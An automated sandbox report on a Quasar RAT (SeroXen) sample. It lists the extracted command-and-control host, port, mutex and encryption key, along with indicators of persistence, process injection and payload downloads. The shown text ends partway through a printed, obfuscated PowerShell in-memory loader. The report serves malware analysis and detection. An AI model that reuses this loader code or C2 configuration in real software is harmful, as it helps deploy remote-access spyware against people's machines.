quasar | abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6

Analysis

max time kernel
1803s
max time network
1804s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 12:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.exe
Size

409KB
MD5

4c2bb0618a6eda615c8001d5a7ccd6c0
SHA1

c88d2c8bfc5906a5cfef78893d1132edcffd71f0
SHA256

abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6
SHA512

6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027
SSDEEP

12288:rpg6M1i1v6q1ak/e7xlX7nnvGAwhJLJO:lxqiii6xlLvGjhO

Score

10^/10

quasar seroxen spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

tue-jake.gl.at.ply.gg:29058

Mutex

$Sxr-xPAuDxLNyBmZ7S2WLJ

Attributes

encryption_key
Pw78RUs175dFrKD7lMwH
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
SeroXen
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1072-1-0x0000000000AE0000-0x0000000000B4C000-memory.dmp	family_quasar
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 2968 created 612 2968 powershell.EXE winlogon.exe
PID 4284 created 612 4284 powershell.EXE winlogon.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

Client.exeinstall.exeinstall.exe

pid process

684 Client.exe
4912 install.exe
1492 install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

29 raw.githubusercontent.com
24 raw.githubusercontent.com
25 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

18 ip-api.com

description	pid	process	target process
PID 2968 created 612	2968	powershell.EXE	winlogon.exe
PID 4284 created 612	4284	powershell.EXE	winlogon.exe

pid	process
684	Client.exe
4912	install.exe
1492	install.exe

flow	ioc
29	raw.githubusercontent.com
24	raw.githubusercontent.com
25	raw.githubusercontent.com

flow	ioc
18	ip-api.com

Drops file in System32 directory 20 IoCs

Processes:

powershell.EXEsvchost.exesvchost.exesvchost.exeOfficeClickToRun.exeDllHost.exepowershell.EXE

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk	DllHost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description	pid	process	target process
PID 2968 set thread context of 4380	2968	powershell.EXE	dllhost.exe
PID 4284 set thread context of 1648	4284	powershell.EXE	dllhost.exe

Drops file in Windows directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeSCHTASKS.exeschtasks.exe

pid process

4944 schtasks.exe
4960 SCHTASKS.exe
4904 schtasks.exe

description	ioc	process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

pid	process
4944	schtasks.exe
4960	SCHTASKS.exe
4904	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715484479"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={2D91B293-3CCF-4F1C-8471-7C9DB36D76A1}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.EXEpowershell.EXEdllhost.exedllhost.exe

pid	process
4284	powershell.EXE
4284	powershell.EXE
2968	powershell.EXE
2968	powershell.EXE
2968	powershell.EXE
4284	powershell.EXE
2968	powershell.EXE
4284	powershell.EXE
4380	dllhost.exe
4380	dllhost.exe
4380	dllhost.exe
4380	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe
1648	dllhost.exe

Suspicious use of AdjustPrivilegeToken 63 IoCs

Processes:

Uni.exeClient.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exeRuntimeBroker.exedwm.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	1072	Uni.exe
Token: SeDebugPrivilege	684	Client.exe
Token: SeDebugPrivilege	4284	powershell.EXE
Token: SeDebugPrivilege	2968	powershell.EXE
Token: SeDebugPrivilege	4284	powershell.EXE
Token: SeDebugPrivilege	2968	powershell.EXE
Token: SeDebugPrivilege	4380	dllhost.exe
Token: SeDebugPrivilege	1648	dllhost.exe
Token: SeShutdownPrivilege	4000	RuntimeBroker.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	1016	dwm.exe
Token: SeCreatePagefilePrivilege	1016	dwm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Client.exe

pid process

684 Client.exe

pid	process
684	Client.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Uni.exeClient.exepowershell.EXEdllhost.exelsass.exepowershell.EXE

description	pid	process	target process
PID 1072 wrote to memory of 4944	1072	Uni.exe	schtasks.exe
PID 1072 wrote to memory of 4944	1072	Uni.exe	schtasks.exe
PID 1072 wrote to memory of 4944	1072	Uni.exe	schtasks.exe
PID 1072 wrote to memory of 684	1072	Uni.exe	Client.exe
PID 1072 wrote to memory of 684	1072	Uni.exe	Client.exe
PID 1072 wrote to memory of 684	1072	Uni.exe	Client.exe
PID 1072 wrote to memory of 4912	1072	Uni.exe	install.exe
PID 1072 wrote to memory of 4912	1072	Uni.exe	install.exe
PID 1072 wrote to memory of 4912	1072	Uni.exe	install.exe
PID 1072 wrote to memory of 4960	1072	Uni.exe	SCHTASKS.exe
PID 1072 wrote to memory of 4960	1072	Uni.exe	SCHTASKS.exe
PID 1072 wrote to memory of 4960	1072	Uni.exe	SCHTASKS.exe
PID 684 wrote to memory of 4904	684	Client.exe	schtasks.exe
PID 684 wrote to memory of 4904	684	Client.exe	schtasks.exe
PID 684 wrote to memory of 4904	684	Client.exe	schtasks.exe
PID 684 wrote to memory of 1492	684	Client.exe	install.exe
PID 684 wrote to memory of 1492	684	Client.exe	install.exe
PID 684 wrote to memory of 1492	684	Client.exe	install.exe
PID 2968 wrote to memory of 4380	2968	powershell.EXE	dllhost.exe
PID 2968 wrote to memory of 4380	2968	powershell.EXE	dllhost.exe
PID 2968 wrote to memory of 4380	2968	powershell.EXE	dllhost.exe
PID 2968 wrote to memory of 4380	2968	powershell.EXE	dllhost.exe
PID 2968 wrote to memory of 4380	2968	powershell.EXE	dllhost.exe
PID 2968 wrote to memory of 4380	2968	powershell.EXE	dllhost.exe
PID 2968 wrote to memory of 4380	2968	powershell.EXE	dllhost.exe
PID 2968 wrote to memory of 4380	2968	powershell.EXE	dllhost.exe
PID 4380 wrote to memory of 612	4380	dllhost.exe	winlogon.exe
PID 4380 wrote to memory of 668	4380	dllhost.exe	lsass.exe
PID 4380 wrote to memory of 940	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1016	4380	dllhost.exe	dwm.exe
PID 4380 wrote to memory of 396	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1044	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1116	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1124	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1140	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1148	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1224	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1308	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1332	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1372	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1416	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1576	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1596	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1652	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1696	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1724	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1772	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1828	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 1880	4380	dllhost.exe	svchost.exe
PID 668 wrote to memory of 2668	668	lsass.exe	sysmon.exe
PID 4380 wrote to memory of 1892	4380	dllhost.exe	svchost.exe
PID 4284 wrote to memory of 1648	4284	powershell.EXE	dllhost.exe
PID 4284 wrote to memory of 1648	4284	powershell.EXE	dllhost.exe
PID 4380 wrote to memory of 2008	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 2024	4380	dllhost.exe	svchost.exe
PID 4380 wrote to memory of 2072	4380	dllhost.exe	spoolsv.exe
PID 4380 wrote to memory of 2164	4380	dllhost.exe	svchost.exe
PID 4284 wrote to memory of 1648	4284	powershell.EXE	dllhost.exe
PID 4284 wrote to memory of 1648	4284	powershell.EXE	dllhost.exe
PID 4380 wrote to memory of 2240	4380	dllhost.exe	svchost.exe
PID 4284 wrote to memory of 1648	4284	powershell.EXE	dllhost.exe
PID 4380 wrote to memory of 2380	4380	dllhost.exe	svchost.exe
PID 4284 wrote to memory of 1648	4284	powershell.EXE	dllhost.exe
PID 4284 wrote to memory of 1648	4284	powershell.EXE	dllhost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3145ca82-b602-48c8-9aa2-76c9320299db}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4380

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{99b3d8e7-68de-4f2c-9790-063eeaddc2dd}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:396

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1116

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1148

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FsUOGqBbrpbu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QzBsJmAwXqjXWm,[Parameter(Position=1)][Type]$YyfBcEjPtj)$ABMciemYnzm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+'ct'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InM'+[Char](101)+'m'+'o'+''+'r'+''+'y'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+'l'+''+'e'+'g'+[Char](97)+'t'+'e'+'T'+[Char](121)+'pe',''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+','+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+''+[Char](97)+'le'+[Char](100)+','+[Char](65)+'n'+[Char](115)+'i'+'C'+''+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+''+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$ABMciemYnzm.DefineConstructor('R'+[Char](84)+'S'+[Char](112)+''+[Char](101)+'cial'+[Char](78)+''+[Char](97)+'m'+[Char](101)+','+'H'+'i'+'d'+''+'e'+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$QzBsJmAwXqjXWm).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$ABMciemYnzm.DefineMethod(''+'I'+''+'n'+'vo'+[Char](107)+''+[Char](101)+'',''+'P'+'ubl'+'i'+'c'+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+'S'+[Char](105)+'g'+[C